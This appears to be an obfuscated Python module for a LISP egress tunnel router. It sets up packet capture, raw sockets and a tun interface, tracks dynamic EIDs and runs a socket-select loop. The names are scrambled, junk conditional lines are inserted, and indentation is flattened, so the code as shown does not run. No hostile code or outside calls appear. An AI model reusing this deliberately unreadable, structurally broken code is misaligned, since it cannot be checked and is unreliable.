if 99 - 99: i11iIiiIii % OoooooooOO
if 56 - 56: oooO0oo0oOOOO * o0oo0o
if 98 - 98: OoOO0ooOOoo0O + O0 * o0oo0o + i11iIiiIii - II11iiII - iIii1I11I1II1
if 5 - 5: II11iiII % OoO0O00 % oooO0oo0oOOOO % Oo
def I1Iiii ( ) :
lisp . lisp_set_exception ( )
if ( lisp . lisp_myrlocs [ 0 ] == None ) : return
if 22 - 22: o0000oOoOoO0o * OoOO0ooOOoo0O + oo - OoOO0ooOOoo0O / oOoO0oo0OOOo
if 18 - 18: i1IIi
if 4 - 4: oooO0oo0oOOOO
if 93 - 93: iiiiIi11i % i1IIi
if 83 - 83: oo . OoO0O00 - OoOO0ooOOoo0O . Ooo00oOo00o
ooo00o0o0 = lisp . lisp_get_all_multicast_rles ( )
if 54 - 54: o0000oOoOoO0o % OoOO0ooOOoo0O . II11iiII + iiiiIi11i * i1I1ii1II1iII - i1IIi
if 27 - 27: o0000oOoOoO0o % i1IIi . OoO0O00 % o0oo0o
if 10 - 10: oooO0oo0oOOOO / OoooooooOO
if 50 - 50: i11iIiiIii - OoooooooOO . iiiiIi11i + O0 . i1IIi
O0OOO00OooO = "any"
if 91 - 91: Ooo00oOo00o . i1I1ii1II1iII % OoO0O00 - i1I1ii1II1iII . iiiiIi11i % i11iIiiIii
if 25 - 25: iIii1I11I1II1
if 63 - 63: Oo
oO0oOOOooo = pcappy . open_live ( O0OOO00OooO , 1600 , 0 , 100 )
if 6 - 6: iIii1I11I1II1 - iIii1I11I1II1 % Ooo00oOo00o / iIii1I11I1II1 * o0oo0o
iIi = "(proto 2) or "
if 88 - 88: i1I1ii1II1iII * OoooooooOO . iIii1I11I1II1
iIi += "((dst host "
for IIi111 in lisp . lisp_get_all_addresses ( ) + ooo00o0o0 :
iIi += "{} or " . format ( IIi111 )
if 61 - 61: oOoO0oo0OOOo - II11iiII
iIi = iIi [ 0 : - 4 ]
iIi += ") and ((udp dst port 4341 or 8472 or 4789) or "
iIi += "(udp dst port 4342 and ip[28] == 0x12) or "
iIi += "(proto 17 and (ip[6]&0xe0 == 0x20 or " + "(ip[6]&0xe0 == 0 and ip[7] != 0)))))"
if 16 - 16: i1I1ii1II1iII / iIii1I11I1II1 + II11iiII * i1I1ii1II1iII * OoOO0ooOOoo0O
if 8 - 8: o0oo0o
lisp . lprint ( "Capturing packets for: '{}' on device {}" . format ( iIi ,
O0OOO00OooO ) )
oO0oOOOooo . filter = iIi
if 15 - 15: OoO0O00 / o0000oOoOoO0o % O0 + oOoO0oo0OOOo
if 96 - 96: Oo . OoooooooOO
if 39 - 39: II11iiII + ooOO00oOo
if 80 - 80: II11iiII % ooOO00oOo / oOo0O0Ooo
oO0oOOOooo . loop ( - 1 , o00O , [ O0OOO00OooO , oOo0oooo00o ] )
return
if 54 - 54: OoO0O00 % ooOO00oOo - II11iiII - OoOO0ooOOoo0O
if 71 - 71: Oo . i11iIiiIii
if 56 - 56: O0 * i1I1ii1II1iII + i1I1ii1II1iII * iIii1I11I1II1 / Oo * o0oo0o
if 25 - 25: iIii1I11I1II1 . OoOO0ooOOoo0O * i11iIiiIii + OoO0O00 * OoOO0ooOOoo0O
if 67 - 67: i1I1ii1II1iII
if 88 - 88: OoO0O00
if 8 - 8: oOoO0oo0OOOo
def o000 ( ) :
global I11
global i1111
global Oo0o0000o0o0
global oOo0oooo00o
global oO0o0o0ooO0oO
global oo0o0O00
if 30 - 30: o0000oOoOoO0o + II111iiii % OoooooooOO
lisp . lisp_i_am ( "etr" )
lisp . lisp_set_exception ( )
lisp . lisp_print_banner ( "ETR starting up" )
if 89 - 89: o0000oOoOoO0o
if 51 - 51: i1I1ii1II1iII
if 68 - 68: i1I1ii1II1iII - Ooo00oOo00o * ooOO00oOo % Oo . Oo - iIii1I11I1II1
if 22 - 22: OoooooooOO / oOoO0oo0OOOo % i1I1ii1II1iII * oOo0O0Ooo
lisp . lisp_get_local_interfaces ( )
lisp . lisp_get_local_macs ( )
if ( lisp . lisp_get_local_addresses ( ) == False ) : return ( False )
if 32 - 32: OoooooooOO % iiiiIi11i % iIii1I11I1II1 / O0
if 61 - 61: II111iiii . O0 - o0000oOoOoO0o - oOoO0oo0OOOo / i11iIiiIii - II111iiii
if 98 - 98: o0000oOoOoO0o - oo . i11iIiiIii * OoO0O00
if 29 - 29: o0000oOoOoO0o / Oo % OoOO0ooOOoo0O
if 10 - 10: iIii1I11I1II1 % OoooooooOO % oOoO0oo0OOOo
if 39 - 39: II111iiii * oOo0O0Ooo . O0 * OoOO0ooOOoo0O
if 89 - 89: o0000oOoOoO0o - Oo . OoOO0ooOOoo0O - o0oo0o - oo
if 79 - 79: oooO0oo0oOOOO + oooO0oo0oOOOO + o0000oOoOoO0o
if 39 - 39: O0 - OoooooooOO
if 63 - 63: iIii1I11I1II1 % Ooo00oOo00o * Oo
if 79 - 79: O0
if 32 - 32: II111iiii . O0 + o0000oOoOoO0o / oOo0O0Ooo / oooO0oo0oOOOO / II11iiII
if 15 - 15: oOoO0oo0OOOo
if 4 - 4: oooO0oo0oOOOO + iIii1I11I1II1 * i1I1ii1II1iII + OoO0O00 * Ooo00oOo00o % II111iiii
if 88 - 88: iiiiIi11i - i1IIi % i11iIiiIii % II111iiii * OoooooooOO
o0O00oOoOO = lisp . lisp_open_listen_socket ( "0.0.0.0" , str ( i11 ) )
o0O00oOoOO . setsockopt ( socket . IPPROTO_IP , socket . IP_MULTICAST_TTL , 32 )
i1111 = o0O00oOoOO
if 40 - 40: OoO0O00
if 47 - 47: oOo0O0Ooo
if 65 - 65: O0 + o0oo0o % o0000oOoOoO0o * oo / Oo / oOo0O0Ooo
if 71 - 71: i11iIiiIii / oOo0O0Ooo . iiiiIi11i
I11 = lisp . lisp_open_listen_socket ( "" , "lisp-etr" )
if 33 - 33: iiiiIi11i
Oo0o0000o0o0 [ 0 ] = i1111
Oo0o0000o0o0 [ 1 ] = lisp . lisp_open_send_socket ( "" , lisp . LISP_AFI_IPV6 )
Oo0o0000o0o0 [ 2 ] = I11
if 39 - 39: ooOO00oOo + O0 + Oo * II111iiii % O0 - O0
if 41 - 41: oooO0oo0oOOOO % Ooo00oOo00o
if 67 - 67: O0 % o0oo0o
if 35 - 35: oo . oOo0O0Ooo + OoooooooOO % OoO0O00 % II11iiII
if 39 - 39: o0000oOoOoO0o
if 60 - 60: II11iiII
if 62 - 62: o0oo0o * OoOO0ooOOoo0O
if 74 - 74: oOo0O0Ooo . iIii1I11I1II1
if 87 - 87: Oo
oOo0oooo00o = socket . socket ( socket . AF_INET , socket . SOCK_RAW ,
socket . IPPROTO_RAW )
oOo0oooo00o . setsockopt ( socket . SOL_IP , socket . IP_HDRINCL , 1 )
Oo0o0000o0o0 . append ( oOo0oooo00o )
if 41 - 41: oOo0O0Ooo . iIii1I11I1II1 % Oo + O0
if 22 - 22: Ooo00oOo00o + OoO0O00 . Oo + oOoO0oo0OOOo * i1I1ii1II1iII . i11iIiiIii
if 90 - 90: II11iiII * oOo0O0Ooo - OoO0O00 + Ooo00oOo00o
if 53 - 53: OoooooooOO . OoooooooOO + Ooo00oOo00o - i1I1ii1II1iII + II11iiII
if 44 - 44: o0oo0o - oooO0oo0oOOOO
if 100 - 100: iiiiIi11i . ooOO00oOo - o0000oOoOoO0o + O0 * ooOO00oOo
if 59 - 59: II111iiii
if 43 - 43: OoO0O00 + OoooooooOO
if 47 - 47: Oo
if 92 - 92: OoOO0ooOOoo0O % i11iIiiIii % OoO0O00
if 23 - 23: II111iiii * i1I1ii1II1iII
if 80 - 80: o0oo0o / i11iIiiIii + OoooooooOO
if 38 - 38: oOoO0oo0OOOo % Oo + i1IIi * OoooooooOO * iiiiIi11i
if 83 - 83: iIii1I11I1II1 - Oo - o0oo0o / ooOO00oOo - O0
if 81 - 81: o0000oOoOoO0o - iiiiIi11i * oOoO0oo0OOOo / o0oo0o
if 21 - 21: ooOO00oOo
if 63 - 63: OoOO0ooOOoo0O . O0 * OoOO0ooOOoo0O + iIii1I11I1II1
if 46 - 46: i1IIi + II111iiii * i1IIi - o0000oOoOoO0o
if 79 - 79: II111iiii - iiiiIi11i * oOoO0oo0OOOo - oOo0O0Ooo . oOoO0oo0OOOo
if 11 - 11: O0 * oOo0O0Ooo
if 37 - 37: oOo0O0Ooo + O0 . O0 * OoO0O00 % o0oo0o / i1I1ii1II1iII
if 18 - 18: OoooooooOO
if ( pytun != None ) :
oo0o0O00 = '\x00\x00\x86\xdd'
O0OOO00OooO = "lispers.net"
try :
oO0o0o0ooO0oO = pytun . TunTapDevice ( flags = pytun . IFF_TUN ,
name = O0OOO00OooO )
os . system ( "ip link set dev {} up" . format ( O0OOO00OooO ) )
except :
lisp . lprint ( "Cannot create tuntap interface" )
if 57 - 57: Oo . oOo0O0Ooo * Ooo00oOo00o - OoooooooOO
if 75 - 75: i11iIiiIii / Ooo00oOo00o . oooO0oo0oOOOO . i1IIi . i1IIi / OoOO0ooOOoo0O
if 94 - 94: Oo + oo
if 56 - 56: oOo0O0Ooo % Ooo00oOo00o
if 40 - 40: II11iiII / oooO0oo0oOOOO
if 29 - 29: o0000oOoOoO0o - o0000oOoOoO0o / Oo
threading . Thread ( target = I1Iiii , args = [ ] ) . start ( )
if 49 - 49: OoOO0ooOOoo0O + iiiiIi11i % ooOO00oOo - OoO0O00 - O0 - OoooooooOO
if 4 - 4: II111iiii - iiiiIi11i % OoO0O00 * i11iIiiIii
if 18 - 18: OoO0O00 % O0
if 66 - 66: iIii1I11I1II1 % i11iIiiIii / oo
threading . Thread ( target = o0O0O , args = [ ] ) . start ( )
return ( True )
if 47 - 47: oOoO0oo0OOOo * iiiiIi11i + iIii1I11I1II1 - iiiiIi11i / oooO0oo0oOOOO
if 86 - 86: oooO0oo0oOOOO
if 43 - 43: oo / i1I1ii1II1iII / Oo + iIii1I11I1II1 + OoooooooOO
if 33 - 33: II111iiii - oooO0oo0oOOOO - Oo
if 92 - 92: ooOO00oOo * oooO0oo0oOOOO
if 92 - 92: iiiiIi11i
if 7 - 7: i1I1ii1II1iII
def oOOoOO0O00o ( ) :
global o0oOoO00o
global oOOoo00O0O
if 38 - 38: i11iIiiIii . iIii1I11I1II1 . II11iiII / ooOO00oOo
if 18 - 18: OoO0O00 * o0oo0o
if 99 - 99: II111iiii * iIii1I11I1II1 % O0 * iiiiIi11i / II111iiii % OoooooooOO
if 14 - 14: oooO0oo0oOOOO . oooO0oo0oOOOO % Oo
if ( o0oOoO00o ) : o0oOoO00o . cancel ( )
if ( oOOoo00O0O ) : oOOoo00O0O . cancel ( )
if 42 - 42: Ooo00oOo00o . II11iiII - Oo
if 33 - 33: II111iiii / O0 / oooO0oo0oOOOO - OoOO0ooOOoo0O - i1IIi
if 8 - 8: i11iIiiIii . i1I1ii1II1iII / iIii1I11I1II1 / oOoO0oo0OOOo / oooO0oo0oOOOO - o0000oOoOoO0o
if 32 - 32: Ooo00oOo00o . i1IIi * OoO0O00
lisp . lisp_close_socket ( Oo0o0000o0o0 [ 0 ] , "" )
lisp . lisp_close_socket ( Oo0o0000o0o0 [ 1 ] , "" )
lisp . lisp_close_socket ( I11 , "lisp-etr" )
return
if 98 - 98: o0000oOoOoO0o - II111iiii / oo . iiiiIi11i * oooO0oo0oOOOO . OoOO0ooOOoo0O
if 25 - 25: i11iIiiIii / oOo0O0Ooo - o0oo0o / ooOO00oOo . Ooo00oOo00o . Ooo00oOo00o
if 6 - 6: iiiiIi11i . OoOO0ooOOoo0O
if 43 - 43: oOoO0oo0OOOo + Ooo00oOo00o
if 50 - 50: iiiiIi11i % i1IIi * O0
if 4 - 4: iIii1I11I1II1 . i1IIi
if 63 - 63: iIii1I11I1II1 + oooO0oo0oOOOO % i1IIi / oo % II111iiii
if 60 - 60: Ooo00oOo00o . oOo0O0Ooo % o0oo0o / oo / O0
if 19 - 19: i11iIiiIii . oo + II111iiii / II11iiII . oOoO0oo0OOOo * Oo
def oo0O ( ipc ) :
ipc = ipc . split ( "%" )
Ooooo0O0 = ipc [ 1 ]
oOoO000 = ipc [ 2 ]
if ( oOoO000 == "None" ) : oOoO000 = None
if 86 - 86: iIii1I11I1II1 - OoOO0ooOOoo0O % Oo . II11iiII * oOo0O0Ooo . i1IIi
O00oO0 = lisp . lisp_address ( lisp . LISP_AFI_NONE , "" , 0 , 0 )
O00oO0 . store_address ( Ooooo0O0 )
if 75 - 75: OoOO0ooOOoo0O + Oo / Oo - II11iiII * ooOO00oOo * Oo
if 53 - 53: oooO0oo0oOOOO % OoO0O00
if 42 - 42: i11iIiiIii / oo - ooOO00oOo - Oo + II111iiii % Oo
if 50 - 50: OoooooooOO + iiiiIi11i * oo - o0000oOoOoO0o / i11iIiiIii
oo000 = lisp . lisp_db_for_lookups . lookup_cache ( O00oO0 , False )
if ( oo000 == None or oo000 . dynamic_eid_configured ( ) == False ) :
lisp . lprint ( "ITR/ETR dynamic-EID configuration out of sync for {}" . format ( lisp . green ( Ooooo0O0 , False ) ) )
if 5 - 5: O0 - oo
return
if 44 - 44: II111iiii . II111iiii + II11iiII * o0000oOoOoO0o
if 16 - 16: II111iiii
if 100 - 100: O0 - i1IIi
if 48 - 48: iiiiIi11i % Oo + O0
if 27 - 27: oOoO0oo0OOOo / II11iiII
if 33 - 33: OoooooooOO % oOoO0oo0OOOo . O0 / oOoO0oo0OOOo
O00oOo00o0o = None
if ( oo000 . dynamic_eids . has_key ( Ooooo0O0 ) ) : O00oOo00o0o = oo000 . dynamic_eids [ Ooooo0O0 ]
if 63 - 63: oooO0oo0oOOOO + iIii1I11I1II1 + oo + o0oo0o
if ( O00oOo00o0o == None and oOoO000 == None ) :
lisp . lprint ( "ITR/ETR state mismatch for {}" . format ( lisp . green ( Ooooo0O0 , False ) ) )
if 72 - 72: ooOO00oOo + i11iIiiIii + oOoO0oo0OOOo
return
if 96 - 96: iiiiIi11i % i1IIi / Ooo00oOo00o
if 13 - 13: II111iiii - OoO0O00 % i11iIiiIii + i1I1ii1II1iII
if 88 - 88: O0 . iiiiIi11i % oo
if 10 - 10: oo + O0
if 75 - 75: O0 % iIii1I11I1II1 / oOo0O0Ooo % II11iiII / oooO0oo0oOOOO
if 31 - 31: i11iIiiIii * oOo0O0Ooo
if 69 - 69: i11iIiiIii
if ( O00oOo00o0o and oOoO000 ) :
if ( O00oOo00o0o . interface == oOoO000 ) :
lisp . lprint ( "ITR sent redundant IPC for {}" . format ( lisp . green ( Ooooo0O0 , False ) ) )
if 61 - 61: O0
else :
lisp . lprint ( "Dynamic-EID {} interface change, {} -> {}" . format ( lisp . green ( Ooooo0O0 , False ) , O00oOo00o0o . interface , oOoO000 ) )
if 21 - 21: ooOO00oOo % iIii1I11I1II1 . ooOO00oOo
O00oOo00o0o . interface = oOoO000
if 99 - 99: Ooo00oOo00o * II11iiII % iiiiIi11i * iiiiIi11i + OoooooooOO
return
if 82 - 82: OoOO0ooOOoo0O / oOo0O0Ooo - II11iiII / Oo
if 50 - 50: II11iiII + ooOO00oOo . i11iIiiIii + oOoO0oo0OOOo + i11iIiiIii
if 31 - 31: iiiiIi11i * o0oo0o . oOo0O0Ooo * OoOO0ooOOoo0O
if 28 - 28: oooO0oo0oOOOO + oo - OoO0O00 % II11iiII . OoOO0ooOOoo0O + oo
if 72 - 72: o0000oOoOoO0o / OoO0O00 / iiiiIi11i * oOo0O0Ooo + II11iiII
if ( oOoO000 ) :
O00oOo00o0o = lisp . lisp_dynamic_eid ( )
O00oOo00o0o . dynamic_eid . copy_address ( O00oO0 )
O00oOo00o0o . interface = oOoO000
O00oOo00o0o . get_timeout ( oOoO000 )
oo000 . dynamic_eids [ Ooooo0O0 ] = O00oOo00o0o
if 58 - 58: Ooo00oOo00o % oo . oo * ooOO00oOo - oooO0oo0oOOOO . OoooooooOO
iI1111i1i11Ii = lisp . bold ( "Registering" , False )
Ooooo0O0 = lisp . bold ( Ooooo0O0 , False )
lisp . lprint ( "{} dynamic-EID {} on interface {}, timeout {}" . format ( iI1111i1i11Ii ,
lisp . green ( Ooooo0O0 , False ) , oOoO000 , O00oOo00o0o . timeout ) )
if 62 - 62: i1I1ii1II1iII
O00oO000O0O ( Oo0o0000o0o0 , None , O00oO0 , None , False )
if 8 - 8: i1I1ii1II1iII - oo * OoO0O00 % oOoO0oo0OOOo * OoooooooOO
if 26 - 26: i1IIi / i1I1ii1II1iII . i1I1ii1II1iII
if 20 - 20: II11iiII - i1I1ii1II1iII / OoO0O00 * ooOO00oOo
if 55 - 55: OoooooooOO
if ( lisp . lisp_is_macos ( ) == False ) :
Ooooo0O0 = O00oO0 . print_prefix_no_iid ( )
OO0OOOOOo = "ip route add {} dev {}" . format ( Ooooo0O0 , oOoO000 )
os . system ( OO0OOOOOo )
if 7 - 7: O0 + o0000oOoOoO0o . II111iiii
return
if 12 - 12: oo - i1IIi
if 95 - 95: OoOO0ooOOoo0O / oooO0oo0oOOOO . O0 * oooO0oo0oOOOO - Ooo00oOo00o * OoO0O00
if 6 - 6: oOo0O0Ooo . II111iiii * oo . oo / o0000oOoOoO0o
if 14 - 14: o0oo0o % oooO0oo0oOOOO - O0 / o0oo0o
if 91 - 91: i11iIiiIii % o0oo0o * iiiiIi11i - oOoO0oo0OOOo . o0oo0o
if ( oo000 . dynamic_eids . has_key ( Ooooo0O0 ) ) :
oOoO000 = oo000 . dynamic_eids [ Ooooo0O0 ] . interface
iI = lisp . bold ( "Deregistering" , False )
lisp . lprint ( "{} dynamic-EID {}" . format ( iI ,
lisp . green ( Ooooo0O0 , False ) ) )
if 66 - 66: i1I1ii1II1iII / i11iIiiIii * O0
O00oO000O0O ( Oo0o0000o0o0 , 0 , O00oO0 , None , False )
if 78 - 78: oooO0oo0oOOOO - OoOO0ooOOoo0O % O0 - II11iiII % ooOO00oOo
oo000 . dynamic_eids . pop ( Ooooo0O0 )
if 43 - 43: ooOO00oOo
if 90 - 90: OoooooooOO + O0 + oOoO0oo0OOOo / OoOO0ooOOoo0O / o0000oOoOoO0o * oOoO0oo0OOOo
if 100 - 100: OoOO0ooOOoo0O
if 82 - 82: iIii1I11I1II1
if ( lisp . lisp_is_macos ( ) == False ) :
Ooooo0O0 = O00oO0 . print_prefix_no_iid ( )
OO0OOOOOo = "ip route delete {} dev {}" . format ( Ooooo0O0 , oOoO000 )
os . system ( OO0OOOOOo )
if 19 - 19: oo
if 66 - 66: iiiiIi11i / oOo0O0Ooo
return
if 13 - 13: II111iiii
if 55 - 55: OoO0O00 % i1IIi * OoOO0ooOOoo0O
if 95 - 95: II11iiII / II111iiii - Ooo00oOo00o % o0oo0o . OoOO0ooOOoo0O
if 63 - 63: iIii1I11I1II1 / Oo
if 24 - 24: OoO0O00 / iIii1I11I1II1 % II11iiII * oOo0O0Ooo - iIii1I11I1II1
if 50 - 50: II111iiii
if 39 - 39: II111iiii . oOo0O0Ooo - OoO0O00 * i1IIi . OoooooooOO
if 44 - 44: oo
if 55 - 55: iiiiIi11i . o0oo0o * o0oo0o
def OO0OO00ooO0 ( ipc ) :
if ( lisp . lisp_register_all_rtrs ) : return
if 68 - 68: oOo0O0Ooo * oOoO0oo0OOOo - OoooooooOO - OoOO0ooOOoo0O + iIii1I11I1II1 * i11iIiiIii
OoOiII11IiIi , iII1I1IiI11ii , I1iIiiiI1 = ipc . split ( "%" )
if ( lisp . lisp_rtr_list . has_key ( iII1I1IiI11ii ) == False ) : return
if 27 - 27: ooOO00oOo + oOo0O0Ooo
lisp . lprint ( "Process ITR IPC message, RTR {} has gone {}" . format (
lisp . red ( iII1I1IiI11ii , False ) , lisp . bold ( I1iIiiiI1 , False ) ) )
if 97 - 97: i1IIi * o0oo0o . II111iiii
OooooOoooO = lisp . lisp_rtr_list [ iII1I1IiI11ii ]
if ( I1iIiiiI1 == "down" ) :
lisp . lisp_rtr_list [ iII1I1IiI11ii ] = None
return
if 62 - 62: OoooooooOO . o0000oOoOoO0o
if 28 - 28: iiiiIi11i . iiiiIi11i . iIii1I11I1II1 . II11iiII . oOoO0oo0OOOo * i11iIiiIii
OooooOoooO = lisp . lisp_address ( lisp . LISP_AFI_IPV4 , iII1I1IiI11ii , 32 , 0 )
lisp . lisp_rtr_list [ iII1I1IiI11ii ] = OooooOoooO
return
if 72 - 72: OoOO0ooOOoo0O
if 26 - 26: oooO0oo0oOOOO % OoO0O00
if 72 - 72: O0 + Ooo00oOo00o + oo / OoO0O00
if 83 - 83: oooO0oo0oOOOO - oo . o0000oOoOoO0o
if 34 - 34: oOo0O0Ooo - iiiiIi11i * OoooooooOO
if 5 - 5: i11iIiiIii * i1I1ii1II1iII - o0000oOoOoO0o - oOoO0oo0OOOo - i1IIi + i1I1ii1II1iII
if 4 - 4: Oo + O0 . i1IIi * oOoO0oo0OOOo - Ooo00oOo00o
if 42 - 42: Ooo00oOo00o * oOo0O0Ooo . ooOO00oOo - i1I1ii1II1iII / II111iiii
def iII1ii11III ( ipc ) :
O0OO0oOO , OoOiII11IiIi , OOOO0oO0O , ooooOO000oooO0 = ipc . split ( "%" )
ooooOO000oooO0 = int ( ooooOO000oooO0 , 16 )
if 75 - 75: i11iIiiIii
Ii111III1i11I = lisp . lisp_get_echo_nonce ( None , OOOO0oO0O )
if ( Ii111III1i11I == None ) : Ii111III1i11I = lisp . lisp_echo_nonce ( OOOO0oO0O )
if 62 - 62: OoOO0ooOOoo0O . ooOO00oOo + ooOO00oOo + II111iiii * iIii1I11I1II1 + OoooooooOO
if ( OoOiII11IiIi == "R" ) :
Ii111III1i11I . request_nonce_sent = ooooOO000oooO0
lisp . lprint ( "Waiting for echo-nonce 0x{} from {}" . format ( lisp . lisp_hex_string ( ooooOO000oooO0 ) , lisp . red ( Ii111III1i11I . rloc_str , False ) ) )
if 77 - 77: O0 * oOoO0oo0OOOo * iiiiIi11i + ooOO00oOo + oOoO0oo0OOOo - o0oo0o
elif ( OoOiII11IiIi == "E" ) :
Ii111III1i11I . echo_nonce_sent = ooooOO000oooO0
lisp . lprint ( "Sent echo-nonce 0x{} to {}" . format ( lisp . lisp_hex_string ( ooooOO000oooO0 ) , lisp . red ( Ii111III1i11I . rloc_str , False ) ) )
if 10 - 10: oOoO0oo0OOOo + oooO0oo0oOOOO
if 58 - 58: oo + OoooooooOO / i1I1ii1II1iII . Oo % Ooo00oOo00o / oOoO0oo0OOOo
return
if 62 - 62: II111iiii
if 12 - 12: oooO0oo0oOOOO + II111iiii
if 92 - 92: o0oo0o % iIii1I11I1II1 - i1I1ii1II1iII / i11iIiiIii % Oo * Ooo00oOo00o
if 80 - 80: i1I1ii1II1iII
if 3 - 3: oOoO0oo0OOOo * OoOO0ooOOoo0O
Oo00O = {
"lisp xtr-parameters" : [ lispconfig . lisp_xtr_command , {
"rloc-probing" : [ True , "yes" , "no" ] ,
"nonce-echoing" : [ True , "yes" , "no" ] ,
"data-plane-security" : [ True , "yes" , "no" ] ,
"data-plane-logging" : [ True , "yes" , "no" ] ,
"frame-logging" : [ True , "yes" , "no" ] ,
"flow-logging" : [ True , "yes" , "no" ] ,
"nat-traversal" : [ True , "yes" , "no" ] ,
"checkpoint-map-cache" : [ True , "yes" , "no" ] ,
"ipc-data-plane" : [ True , "yes" , "no" ] ,
"decentralized-xtr" : [ True , "yes" , "no" ] ,
"register-reachable-rtrs" : [ True , "yes" , "no" ] ,
"program-hardware" : [ True , "yes" , "no" ] } ] ,
"lisp interface" : [ lispconfig . lisp_interface_command , {
"interface-name" : [ True ] ,
"device" : [ True ] ,
"instance-id" : [ True , 0 , 0xffffffff ] ,
"dynamic-eid" : [ True ] ,
"dynamic-eid-device" : [ True ] ,
"lisp-nat" : [ True , "yes" , "no" ] ,
"dynamic-eid-timeout" : [ True , 0 , 0xff ] } ] ,
"lisp map-server" : [ III1IiiI , {
"ms-name" : [ True ] ,
"address" : [ True ] ,
"dns-name" : [ True ] ,
"authentication-type" : [ False , "sha1" , "sha2" ] ,
"authentication-key" : [ False ] ,
"encryption-key" : [ False ] ,
"proxy-reply" : [ False , "yes" , "no" ] ,
"want-map-notify" : [ False , "yes" , "no" ] ,
"merge-registrations" : [ False , "yes" , "no" ] ,
"refresh-registrations" : [ False , "yes" , "no" ] ,
"site-id" : [ False , 1 , 0xffffffffffffffff ] } ] ,
"lisp database-mapping" : [ OoooooOoo , {
"prefix" : [ ] ,
"mr-name" : [ True ] ,
"ms-name" : [ True ] ,
"instance-id" : [ True , 0 , 0xffffffff ] ,
"secondary-instance-id" : [ True , 0 , 0xffffffff ] ,
"eid-prefix" : [ True ] ,
"group-prefix" : [ True ] ,
"dynamic-eid" : [ True , "yes" , "no" ] ,
"signature-eid" : [ True , "yes" , "no" ] ,
"rloc" : [ ] ,
"rloc-record-name" : [ True ] ,
"elp-name" : [ True ] ,
"geo-name" : [ True ] ,
"rle-name" : [ True ] ,
"json-name" : [ True ] ,
"address" : [ True ] ,
"interface" : [ True ] ,
"priority" : [ True , 0 , 255 ] ,
"weight" : [ True , 0 , 100 ] } ] ,
"lisp explicit-locator-path" : [ lispconfig . lisp_elp_command , {
"elp-name" : [ False ] ,
"elp-node" : [ ] ,
"address" : [ True ] ,
"probe" : [ True , "yes" , "no" ] ,
"strict" : [ True , "yes" , "no" ] ,
"eid" : [ True , "yes" , "no" ] } ] ,
"lisp replication-list-entry" : [ lispconfig . lisp_rle_command , {
"rle-name" : [ False ] ,
"rle-node" : [ ] ,
"address" : [ True ] ,
"level" : [ True , 0 , 255 ] } ] ,
"lisp geo-coordinates" : [ lispconfig . lisp_geo_command , {
"geo-name" : [ False ] ,
"geo-tag" : [ False ] } ] ,
"lisp json" : [ lispconfig . lisp_json_command , {
"json-name" : [ False ] ,
"json-string" : [ False ] } ] ,
"lisp group-mapping" : [ ooooooo00o , {
"group-name" : [ False ] ,
"ms-name" : [ True ] ,
"group-prefix" : [ False ] ,
"instance-id" : [ True , 0 , 0xffffffff ] ,
"rle-address" : [ False ] ,
"sources" : [ ] ,
"address" : [ True ] } ] ,
"show database-mapping" : [ oO00 , { } ] ,
"show etr-keys" : [ oOOo0oOo0 , { } ] ,
"show etr-dynamic-eid" : [ lispconfig . lisp_show_dynamic_eid_command , { } ]
}
if 44 - 44: Oo * OoOO0ooOOoo0O
if 12 - 12: o0000oOoOoO0o . oo % Ooo00oOo00o
if 28 - 28: o0000oOoOoO0o - oo % ooOO00oOo * o0oo0o
if 80 - 80: II11iiII * oooO0oo0oOOOO
if 4 - 4: iIii1I11I1II1 . o0oo0o + II111iiii % OoooooooOO
if 82 - 82: OoooooooOO / Oo * OoOO0ooOOoo0O * O0 . oOoO0oo0OOOo
if ( o000 ( ) == False ) :
lisp . lprint ( "lisp_etr_startup() failed" )
lisp . lisp_print_banner ( "ETR abnormal exit" )
exit ( 1 )
if 21 - 21: II111iiii + OoO0O00
if 59 - 59: II11iiII + oo / II111iiii / oOo0O0Ooo
oOoo00 = [ i1111 , I11 ]
if 29 - 29: II11iiII / oOo0O0Ooo . iIii1I11I1II1 / OoOO0ooOOoo0O % oOo0O0Ooo % i1I1ii1II1iII
while ( True ) :
try : iiI1 , oooOOO0o0O0 , O0OO0oOO = select . select ( oOoo00 , [ ] , [ ] )
except : break
if 31 - 31: OoooooooOO - iiiiIi11i / o0oo0o
if 62 - 62: i11iIiiIii - OoOO0ooOOoo0O
if 81 - 81: OoOO0ooOOoo0O
if 92 - 92: II11iiII - OoO0O00 - OoooooooOO / oooO0oo0oOOOO - i1IIi
if ( i1111 in iiI1 ) :
OoOiII11IiIi , II1iIi11 , i11i11II11i , OO0 = lisp . lisp_receive ( i1111 , False )
if 81 - 81: i1IIi / o0oo0o % i11iIiiIii . iIii1I11I1II1 * oOo0O0Ooo + OoooooooOO
if ( II1iIi11 == "" ) : break
if 31 - 31: i1IIi % II111iiii
if ( i11i11II11i == lisp . LISP_DATA_PORT ) :
OOOO ( oOo0oooo00o , OO0 , II1iIi11 )
else :
if ( lisp . lisp_is_rloc_probe_request ( OO0 [ 0 ] ) ) :
lisp . lprint ( "ETR ignoring RLOC-probe request, using pcap" )
continue
if 13 - 13: iIii1I11I1II1 - II111iiii % O0 . o0000oOoOoO0o % ooOO00oOo
Ii11iIiiI = lisp . lisp_parse_packet ( Oo0o0000o0o0 , OO0 ,
II1iIi11 , i11i11II11i )
if 3 - 3: II111iiii / II11iiII
if 48 - 48: Oo . oOoO0oo0OOOo
if 49 - 49: i1IIi - oOo0O0Ooo . OoO0O00 + iIii1I11I1II1 - Oo / OoO0O00
if 24 - 24: iiiiIi11i - i1I1ii1II1iII / Oo
if 10 - 10: oOo0O0Ooo * i1IIi
if ( Ii11iIiiI ) :
oOOoo00O0O = threading . Timer ( 0 ,
oOo0O , [ None ] )
oOOoo00O0O . start ( )
o0oOoO00o = threading . Timer ( 0 ,
ooO0o0Oo , [ Oo0o0000o0o0 ] )
o0oOoO00o . start ( )
if 15 - 15: OoOO0ooOOoo0O + i1IIi - II111iiii % oo
if 34 - 34: oo
if 57 - 57: II11iiII . o0000oOoOoO0o % Ooo00oOo00o
if 32 - 32: OoOO0ooOOoo0O / oooO0oo0oOOOO - O0 * iIii1I11I1II1
if 70 - 70: OoooooooOO % OoooooooOO % ooOO00oOo
if 98 - 98: ooOO00oOo
if 18 - 18: OoOO0ooOOoo0O + OoO0O00 - ooOO00oOo / o0oo0o / II11iiII
if 53 - 53: II11iiII + Ooo00oOo00o . iiiiIi11i / OoOO0ooOOoo0O
if ( I11 in iiI1 ) :
OoOiII11IiIi , II1iIi11 , i11i11II11i , OO0 = lisp . lisp_receive ( I11 , True )
if 52 - 52: o0oo0o + o0oo0o
if ( II1iIi11 == "" ) : break
if 73 - 73: Ooo00oOo00o . i11iIiiIii % OoooooooOO + Oo . OoooooooOO / II11iiII
